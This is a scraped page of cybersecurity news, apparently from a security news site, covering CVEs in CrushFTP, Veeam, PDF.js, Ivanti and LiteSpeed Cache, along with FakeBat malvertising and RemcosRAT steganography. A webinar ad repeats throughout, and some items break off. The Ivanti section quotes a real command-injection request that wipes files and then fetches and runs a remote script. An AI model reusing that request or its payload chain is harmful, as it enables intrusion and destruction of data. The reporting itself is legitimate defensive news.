Security Risk Advisors (SRA) announces the launch of their OT/XIoT Detection Selection Workshop, a complimentary offering designed to assist organizations in selecting the most suitable operational technology (OT) and Extended Internet of Things (XIoT) security tools for their unique environments.
Led by seasoned OT/XIoT security consultants, the workshop provides participants with an invaluable opportunity to gain insights into both best-in-class and novel solutions and identify those closest to their specific needs.
In todayβs increasingly interconnected digital landscape, choosing the right OT/XIoT security tools cannot be overstated.
These tools serve as the first line of risk reduction and defense against cyber threats targeting critical industrial processes and infrastructure.
Making informed decisions, whether adding a new solution or replacing an incumbent, significantly impacts an organizationβs ability to mitigate threats and protect its assets.
During the half-day consultation, participants will delve deep into their OT/XIoT security environments, examining current tools and analyzing their infrastructure.
The free workshop will result in personalized recommendations of the best-fit solutions from industry vendors.
βWe recognize the importance of selecting the right security tools for cyber-physical environments,β says Jason Rivera, Director of OT/XIoT Security at SRA. βOur workshop empowers organizations to make informed decisions, giving confidence that their selection is fit for purpose.β
Security Risk Advisors offers Purple Teams, Cloud Security, Penetration Testing, OT Security and 24x7x365 Cybersecurity Operations. Based in Philadelphia, SRA operates across the USA, Ireland and Australia. For more information, visit SRAβs website atΒ https://sra.io.
Contact Marketing Manager Douglas Webster news@sra.io 215-867-9051
A critical vulnerability in CrushFTP, identified as CVE-2024-4040, has been actively exploited in the wild.
It allows attackers to perform unauthenticated remote code execution on vulnerable servers.
This severe security flaw affects versions of CrushFTP before 10.7.1 and 11.1.0, enabling attackers to bypass the Virtual File System (VFS) sandbox, gain administrative privileges, and potentially access sensitive files or execute arbitrary code remotely.
Document
Free Webinar : Live API Attack Simulation
94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise:
Key Takeaways:
An exploit of OWASP API Top 10 vulnerability
A brute force ATO (Account Takeover) attack on API
A DDoS attack on an API
Positive security model automation to prevent API attacks
CVE-2024-4040 was initially disclosed by CrushFTP on April 19, 2024, through a private mailing list and later assigned a high severity score of 9.8.
According to the Broadcom reports, the vulnerability allows low-privileged remote attackers to escape the VFS sandbox and perform actions beyond their designated limits without authentication.
This flaw was initially underestimated as merely allowing file access but has since been recognized for its potential to enable full server compromise.
Security researchers have confirmed that CVE-2024-4040 has been exploited in the wild, with some incidents possibly being state-sponsored or politically motivated.
The attacks have targeted multiple U.S. entities, focusing on intelligence-gathering.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.
Over 7,100 CrushFTP servers have been identified as publicly accessible and potentially vulnerable, highlighting the widespread risk posed by this vulnerability.
Vendor Response and Recommendations
Upon discovery, CrushFTP promptly released patches for the affected versionsβ10.7.1 for the 10.x series and 11.1.0 for the 11.x series.
Security experts strongly advise all users to update their software immediately to these patched versions to mitigate the risk.
Initial recommendations to use a demilitarized zone (DMZ) have been retracted as they may not provide complete protection against this exploit.
In addition to applying the urgent patches, organizations are encouraged to implement stringent security measures.
This includes configuring network rules to limit CrushFTP application access to trusted clients and employing advanced detection systems to identify and respond promptly to suspicious activities.
The exploitation of CVE-2024-4040 underscores the critical importance of maintaining up-to-date security practices and software versions.
Organizations using CrushFTP must take immediate action to patch their systems and safeguard against potential breaches that could lead to severe data loss or system compromise.
Is Your Network Under Attack? - Read CISOβs Guide to Avoiding the Next Breach - Download Free Guide
Hackers have been found exploiting Google search ads to distribute malware through MSI (Microsoft Installer) packages.
This campaign, involving the malware loader known as FakeBat, targets unsuspecting users by masquerading as legitimate software downloads.
The Infection Chain: From Ad to Malware
The attack begins with a Google search ad that appears legitimate, using the real website address of popular software like Notion.
Document
Free Webinar : Live API Attack Simulation
94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise:
Key Takeaways:
An exploit of OWASP API Top 10 vulnerability
A brute force ATO (Account Takeover) attack on API
A DDoS attack on an API
Positive security model automation to prevent API attacks
Start protecting your APIs from hackers
However, the ad is a facade, purchased by threat actors who have consistently used identities linked to Kazakhstan.
According to reports from ThreatDown, who state that hackers are using Google Search Ads to deliver malware that is MSI-packed.
Clicking on the ad redirects to a lookalike site hosted at notilion[.]co.
Clicking on the ad leads to a phishing site hosted at a deceptive URL, resembling the genuine site.
Resembling the genuine site
The site prompts users to download what appears to be a standard software installer in MSIX format, signed under the seemingly credible name “Forth View Designs Ltd.”
They are using a legitimate signature under the name Forth View Designs Ltd
Malicious Payload Delivery
Upon executing the MSIX installer, a hidden malicious PowerShell script is activated.
The final step in this delivery chain is the launch of the MSIX installer
This script is responsible for connecting to the command and control server (C2) of FakeBat, initiating the download of a secondary payload known as zgRAT.
malicious payload
The PowerShell commands executed during this process are designed to bypass local security measures and inject the zgRAT malware directly into system processes, effectively taking control of the infected machine.
Network Manipulations and Malvertising Techniques
The campaign utilizes a click tracker service to manage the effectiveness of the ad and filter out unwanted traffic.
This step involves an intermediary domain that separates the malicious URL from the Google ad, enhancing the stealth of the attack.
Malicious destination URL from the Google ad and the click tracker
Once the malware is installed, the PowerShell script reaches out to the FakeBat C2 server, which dictates the subsequent actions, including the delivery of the zgRAT payload.
ThreatDown, a cybersecurity firm, blocked the C2 used in this campaign and recorded the attack’s progression from the initial MSIX execution to the final payload deployment.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.
MSIX execution
They recommend the use of Endpoint Detection and Response (EDR) systems to monitor and block such malicious activities.
Organizations are advised to restrict or control the use of MSIX files through group policies and to distribute software installers via an internal company repository to avoid the risks associated with malicious ads.
This incident highlights the ongoing risks associated with malvertising and the sophistication of modern cyber threats.
Users and organizations must remain vigilant, employing advanced security measures to protect against these deceptive and damaging attacks.
Χ΄Defenders think in lists, attackers think in graphs,β said John Lambert from Microsoft, distilling the fundamental difference in mindset between those who defend IT systems and those who try to compromise them.
The traditional approach for defenders is to list security gaps directly related to their assets in the network and eliminate as many as possible, starting with the most critical.
A newer version of a malware loader called Hijack Loader has been observed incorporating an updated set of anti-analysis techniques to fly under the radar.
“These enhancements aim to increase the malware’s stealthiness, thereby remaining undetected for longer periods of time,” Zscaler ThreatLabz researcher Muhammed Irfan V A said in a technical report.
“Hijack
Veeam Service Provider console has been discovered with two critical vulnerabilities that were associated with Remote Code Execution.
A CVE for these vulnerabilities is yet to be assigned. These vulnerabilities exist in version 7.x and version 8.x of the Veeam Service Provider Console.
Document
Free Webinar : Live API Attack Simulation
94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise:
Key Takeaways:
An exploit of OWASP API Top 10 vulnerability
A brute force ATO (Account Takeover) attack on API
A DDoS attack on an API
Positive security model automation to prevent API attacks
Start protecting your APIs from hackers
Veeam Service Provider Console is used for remote monitoring and management capabilities from a centralized user interface with API integrations.
However, the company has patched these vulnerabilities on their latest version release.
Veeam RCE Flaws
The Remote code execution vulnerabilities existed due to an unsafe deserialization method in the VSPC server communication between the management agent and its associated components.Β
Threat actors can exploit this unsafe deserialization in a specific condition and achieve remote code execution on the VSPC server machine.
Along with fixing these RCE vulnerabilities, Veeam has also released several bug fixes and improvements on its products, such as new alarm triggers, improvements in public cloud integration, backup for Microsoft 365, and much more.
For VSPC 8 (build 8.0.0.16877), Veeam has informed the users to check their Veeam Service Provider Console’s version 8 before installing the cumulative patch. This can be checked in the backup portal by navigating to Configuration > Support.
As for VSPC 7, the advisory stated that the patch does not contain private fixes created after the release of P20230531 (7.0.0.14271). However, the cumulative patch was released only to address the Remote Code Execution security issue.
Additionally, the advisory also specified that Veeam Service Provider Console 7 has reached end fix in December 2023.
Further, users of these products are recommended to upgrade to the latest versions in order to prevent the exploitation of these vulnerabilities by threat actors.
Is Your Network Under Attack? - Read CISOβs Guide to Avoiding the Next Breach -Β Download Free Guide
A new critical vulnerability has been discovered in PDF.js, which could allow a threat actor to execute arbitrary code when opening a malicious PDF. PDF.js allows browsers to render PDF files without any plugins or external software.Β
This vulnerability affects multiple browsers and applications that use React-PDF.
An interesting fact is that Mozilla PDF.js is the original open-source library that focuses on rendering PDF documents within a browser, and the React-PDF PDF.js is built upon Mozilla PDF.js and used for integrating PDF.js into React applications.
With millions of users using PDF files, the threat landscape for this vulnerability could affect millions of PDF users as well as React applications that use React PDF.
Document
Free Webinar : Live API Attack Simulation
94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise:
Key Takeaways:
An exploit of OWASP API Top 10 vulnerability
A brute force ATO (Account Takeover) attack on API
A DDoS attack on an API
Positive security model automation to prevent API attacks
Start protecting your APIs from hackers
As a matter of this, PDF.js is being used by many browsers like Mozilla Firefox, Safari, Google Chrome, and Edge, making its threat landscape larger than ever.
However, this vulnerability has been patched by Wojciech Maj, the React-pdf project’s maintainer.
PDF.js is built into Mozilla Firefox as a default PDF viewer. There were two CVEs associated with this vulnerability, CVE-2024-34342 and CVE-2024-4367.
Technical Analysis
CVE-2024-34342 : React-pdf’s PDF.js Vulnerable To Arbitrary JavaScript Execution
This vulnerability is related to react-pdf that can be exploited by a threat actor using a malicious PDF file.
However, certain prerequisites for exploiting it completely exist, including using PDF.js to load the malicious PDF and configuring PDF.js with isEvalSupported set to `true`.
If these two conditions exist, then the threat actor will be able to execute JavaScript in the context of the hosting domain.
The severity for this vulnerability has been given as 7.1 (High). React-pdf has patched this vulnerability by forcing `isEvalSupported` to `false` which removes the attack vector.
CVE-2024-4367: Mozilla PDF.js Could Allow For Arbitrary Code Execution
This vulnerability exists in the Mozilla PDF.js library which could allow a threat actor to execute arbitrary code under the context of the logged on user.
Moreover, based on the user’s privilege, it is possible for a threat actor to exploit this vulnerability and βinstall programs; view, change, or delete data; or create new accounts with full user rights.β
The vulnerability exists due to the same reason as the react-pdf PDF.js that has the isEvalSupported set to true as the default value.
The severity for this vulnerability is yet to be categorized.
Nevertheless, it is recommended for users to upgrade their products to the latest versions in order to prevent the exploitation of these vulnerabilities by threat actors.
Is Your Network Under Attack? - Read CISOβs Guide to Avoiding the Next Breach -Β Download Free Guide
Juniper Threat Labs has reported active exploitation attempts targeting vulnerabilities in Ivanti Pulse Secure VPN appliances.
These vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887, have been exploited to deliver the Mirai botnet, among other malware, posing a significant threat to network security worldwide.
Document
Free Webinar : Live API Attack Simulation
94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise:
Key Takeaways:
An exploit of OWASP API Top 10 vulnerability
A brute force ATO (Account Takeover) attack on API
A DDoS attack on an API
Positive security model automation to prevent API attacks
CVE-2023-46805 is a critical security flaw affecting Ivanti Connect Secure (ICS) and Ivanti Policy Secure gateways.
This vulnerability allows remote attackers to bypass authentication mechanisms and gain unauthorized access to restricted resources.
The flaw resides in theΒ /api/v1/totp/user-backup-codeΒ endpoint, which lacks sufficient security checks. This enables attackers to exploit a path traversal flaw and access public-facing areas without proper authentication.
Affected versions include 9. x and 22. x of both Ivanti Connect Secure and Ivanti Policy Secure Gateways.
The second vulnerability, CVE-2024-21887, is a command injection flaw found in the web components of Ivanti Connect Secure and Ivanti Policy Secure.
This vulnerability allows attackers to send specially crafted requests to execute arbitrary commands on the appliance.
This flaw is exploitable over the internet and involves a command injection in theΒ /api/v1/license/key-status/;Β API call.
By exploiting the CVE-2023-46805 vulnerability to gain access to this endpoint, attackers can inject malicious payloads, which can lead to the execution of shell commands and the delivery of malware, including the Mirai botnet.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.
Mirai Botnet Delivery
Juniper Threat Labs’ analysis has revealed instances where attackers have used these vulnerabilities to deliver Mirai payloads through shell scripts.
The following is an example of the observed request:Β
The encoded URL decodes to (This will come in a code block in WordPress) GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; wget http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1
The observed attack involves a command sequence that attempts to wipe files, download a script from a remote server, set executable permissions, and execute the script, potentially leading to a system infection.
The content of wtf.sh (in WordPress, this should come in a code block) Note that the file names use several offensive and derogatory terms and are shown for this research only.
There are five system directories that these tools try to get to: “/tmp”, “/var/run”, “/mnt”, “/root”, and “/”. It gets a file called “lol” from a certain URL (http://192[.]3[.]152[.]183/mips) once it finds a place it can get to.
It lets the downloaded file run after downloading it and runs it with the argument “0day_machine.” Using “||” makes sure that the next commands only run if the tries to change directories failed before.
This means that the following command runs in the first directory that can be reached in the list.
Juniper analyzed the payloads, Which have been identified as part of the Mirai botnet, indicating the severity of the threat posed by these vulnerabilities.
Exploiting Ivanti Pulse Secureβs vulnerabilities for Mirai botnet delivery underscores the evolving landscape of cyber threats.
Juniper Networks SRX Series Next-Generation Firewall (NGFW) customers with an IDP license are protected against these vulnerabilities using specific signatures for CVE-2023-46805 and CVE-2024-21887.
Organizations using Ivanti Pulse Secure appliances are urged to apply the provided patches immediately and review their security posture to protect against these and future vulnerabilities.
Hackers are now using steganography techniques to distribute the notorious Remote Access Trojan (RAT) known as RemcosRAT.
This method, which involves hiding malicious code within seemingly innocuous image files, marks a concerning evolution in malware delivery tactics.
The Initial Breach: Word Documents and RTF Files
The attack begins with a seemingly harmless Word document that contains an external link.
This document employs a template injection technique designed to exploit vulnerabilities within the document’s processing.
The AhnLab Security Intelligence Centre (ASEC) has recently found that steganography is being used to spread RemcosRAT.
A Word document containing an external linkDocument
Free Webinar : Live API Attack Simulation
94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise:
Key Takeaways:
An exploit of OWASP API Top 10 vulnerability
A brute force ATO (Account Takeover) attack on API
A DDoS attack on an API
Positive security model automation to prevent API attacks
Start protecting your APIs from hackers
Upon opening the document, an RTF file is downloaded and executed.
This file exploits a known vulnerability in the equation editor component (EQNEDT32.EXE) of Microsoft Word, leading to the download of a VBScript with a misleading β.jpgβ file extension from a command and control (C2) server.
Another VBScript is fetched from βpaste.eeβ, a service that allows users to upload and share text snippets.
VBScript downloaded by the RTF file
The Steganography Technique
The downloaded VBScript is heavily obfuscated, making it difficult for traditional antivirus software to detect the malicious intent.
This script executes a PowerShell command, which further downloads an image from an external source.
The obfuscated script (eh1G4)
The cunning aspect of this attack lies within the downloaded image file.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.
The image contains Base64 encoded data hidden behind the βFF D9β marker, which typically denotes the end of a JPEG file. The PowerShell script locates the data encoded between β<<BASE64 START>>β and βBASE64_ENDβ markers and decodes it.
The PowerShell script downloading a steganography image
The decoded data reveals a β.NET DLLβ file, which is then executed through reflective code loading, a technique that allows code to be executed within the memory space of a process.
The Base64-encoded data contained in a normal image file
Final Execution: RemcosRAT Deployment
The script doesnβt stop there; it downloads an additional file from the C2 server and creates a RegAsm.exe child process to execute the file using the process hollowing technique.
This ultimately leads to the execution of RemcosRAT on the victim’s machine.
RemcosRAT executed through the process of hollowing
Given the diverse methods through which Remcos RAT can be distributed, including spam emails and disguised crack software download links, users are urged to exercise extreme caution.
Keeping antivirus solutions updated to the latest version is also recommended to block such malware infections preemptively.
This sophisticated use of steganography to conceal and deliver malware represents a significant shift in the landscape of cyber threats.
As attackers continue to innovate, the importance of maintaining robust cybersecurity practices and awareness among users cannot be overstated.
Is Your Network Under Attack? - Read CISOβs Guide to Avoiding the Next Breach - Download Free Guide
A high-severity flaw impacting the LiteSpeed Cache plugin for WordPress is being actively exploited by threat actors to create rogue admin accounts on susceptible websites.
The findings come from WPScan, which said that the vulnerability (CVE-2023-40000, CVSS score: 8.3) has been leveraged to set up bogus admin users with the names wpsuppβuser
![Clicking on the ad redirects to a lookalike site hosted at notilion[.]co](https://gbhackers.com/wp-content/uploads/2024/05/image-19.png)
